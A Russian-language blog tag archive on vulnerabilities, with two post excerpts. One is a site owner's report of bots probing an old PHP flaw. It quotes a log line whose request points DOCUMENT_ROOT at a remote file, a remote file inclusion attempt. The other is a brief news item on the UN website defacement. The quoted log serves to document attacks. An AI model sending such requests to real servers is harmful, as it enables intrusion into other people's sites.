Архив метки: уязвимость

Скрипткиды или боты

Хакеры, а точнее скрипткиды, не спят. Несколько дней назад на мой сайт начали проводиться попытки атак запросами, эксплуатирующими старую уязвимость в PHP. /var/log/messages: Oct  4 03:23:34 220 suhosin[28420]: ALERT — tried to register forbidden variable ‘_SERVER[DOCUMENT_ROOT]‘ through GET variables (attacker ‘77.242.37.212‘, file ‘/xxx/domain.tld/index.php’) Пример запроса (из лога апача): 211.111.213.195 — — [05/Oct/2009:08:26:22 +0300] «GET //?_SERVER[DOCUMENT_ROOT]=https://www.hotlinkfiles.com/files/2380695_oajch/IDtest.txt???… Читать далее »

Дырявый сайт ООН по-прежнему уязвим

Хакеры взломали официальный сайт Организации Объединенных Наций. «Израиль и США не должны убивать детей и простых людей», — говорится в заявлении взломщиков, которое было вывешено в разделе сообщений генсека ООН англоязычной версии сайта. Таким образом взломщики хотели выразить свой киберпротест против войны на Ближнем Востоке. На русскоязычной версии сайта ООН данного сообщения нет. Некоторые СМИ… Читать далее »